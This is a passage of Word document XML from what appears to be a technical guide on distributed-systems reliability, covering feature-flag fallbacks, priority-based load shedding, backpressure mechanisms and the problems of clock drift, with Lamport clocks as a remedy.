    <w:p w14:paraId="0CA86D61" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    showRecommendations();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3478ECCB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E20F753" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    showStaticPopularItems();  // fallback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BCDAE1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7525DEA0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The flag can be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DA87C0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="485"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automatically disabled</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> when the circuit breaker trips.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0296B2AF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="485"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manually disabled</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> by operators during incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A51A68F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="485"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partially disabled</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (show to 50% of users to reduce load on struggling service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596FA4A0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load shedding with priorities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0B7574" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>When system capacity is exceeded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A5A91F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="486"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Classify requests into priority tiers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B55FD20" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="486"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>P0: Checkout, payment (must never fail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDCA000" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="486"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>P1: Product page, search (important)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F2DEB8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="486"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>P2: Recommendations, analytics (nice to have)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E56ED98" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="486"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>P3: Background sync, prefetch (deferrable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E5B542" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="486"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>When overloaded, drop P3 first, then P2, then P1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4267AB66" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="486"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>P0 always gets resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E273CCD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Amazon handles Prime Day:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625448A8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="487"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Non-critical services (recommendation engine, "customers also bought") are configured with aggressive circuit breakers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56743A1C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="487"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If they slow down, they're cut off immediately. The product page renders without them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E61F49" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="487"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Critical path (add to cart, checkout, payment) is on dedicated, over-provisioned infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4B0890" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="487"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Static fallbacks are pre-computed and stored in CDN for every product page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F945C5F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.3 Backpressure — When to Push Back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A87D42" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What backpressure is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDA112A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>When a downstream system is overwhelmed, it signals upstream to slow down — rather than accepting work it can't handle (which leads to cascading failure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD136FA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436C991" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="488"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP 429 (Too Many Requests):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> "I'm overloaded, try later." The Retry-After header tells when.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DFBB14" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="488"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP window = 0:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> TCP's built-in backpressure. Receiver says "my buffer is full, stop sending."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4618F4C3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="488"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Queue size limits:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Message broker rejects publishes when queue hits max depth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4672B87A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="488"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC flow control:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> HTTP/2 window updates control per-stream and per-connection flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1BFFC8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="488"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reactive Streams:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Subscriber requests N items from publisher. Publisher sends at most N. Subscriber requests more when ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F305EDE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why backpressure is a reliability mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB441DD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Without backpressure, an overwhelmed service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674FA59B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="489"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Accepts all requests (queues internally).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759121D8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="489"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Internal queue grows → memory pressure → GC pauses → even slower.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC42F1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="489"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Upstream times out → retries → more load → service crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463111E9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>With backpressure, the overloaded service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6388E2DF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="490"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Rejects excess load immediately (fast failure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15746CF1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="490"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Maintains headroom to serve accepted requests well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E840A8E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="490"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Upstream sees 429, backs off, or routes elsewhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A95BB7C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="490"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>System stabilizes instead of cascading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D464BFA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="5F01391F">
          <v:rect id="_x0000_i2942" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDD9E0D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Clock Reliability — Time in Distributed Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D04FF50" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 Why Clocks Are a Reliability Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C36872" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Physical clocks (wall clocks) are unreliable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8AA2B8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="491"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clock drift:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Quartz oscillators drift 10–200 ppm (parts per million). That's 0.6–17 seconds per day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63916DB8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="491"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clock jumps:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> NTP synchronization can jump the clock forward or backward by seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2B15DE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="491"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Leap seconds:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A second is inserted (23:59:60) or removed. Software often handles this poorly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F2C04F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>If your system relies on synchronized clocks for correctness, it's unreliable</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> unless you take extraordinary measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C88EA8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 Problems Caused by Clock Unreliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7015BBD0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ordering events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD31347" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Node A says "write at 14:00:00.000."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18972FE3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Node B says "write at 14:00:00.005."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B14C791" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If Node A's clock is 10ms fast, B's write actually happened first. Using timestamps for ordering → wrong order → data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6738F70A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lease/lock expiration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A3418" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Node A acquires a lock with a 10-second lease.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785D410D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Node A's clock is slow. It thinks 8 seconds have passed (still has the lock).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9582BD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Actually 12 seconds passed. Lock expired. Node B acquired it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC55F9A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Both A and B think they hold the lock → split-brain → data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F19A11" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certificate/token expiration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B07994" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="494"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A JWT expires at timestamp T.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54352943" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="494"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Server's clock is behind. It accepts the expired token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167CCAFB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="494"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Or server's clock is ahead. It rejects a valid token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C83B847" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.3 Solutions for Clock Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7441655D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logical clocks (Lamport clocks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDA9E5E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Instead of physical time, use logical ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFA401B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="495"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each node maintains a counter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077A4259" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="495"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>On every event: increment counter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78501171" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="495"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>On message send: include counter in message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA1656" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="495"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>On message receive: counter = max(local_counter, received_counter) + 1.</w:t>
      </w:r>
    </w:p>
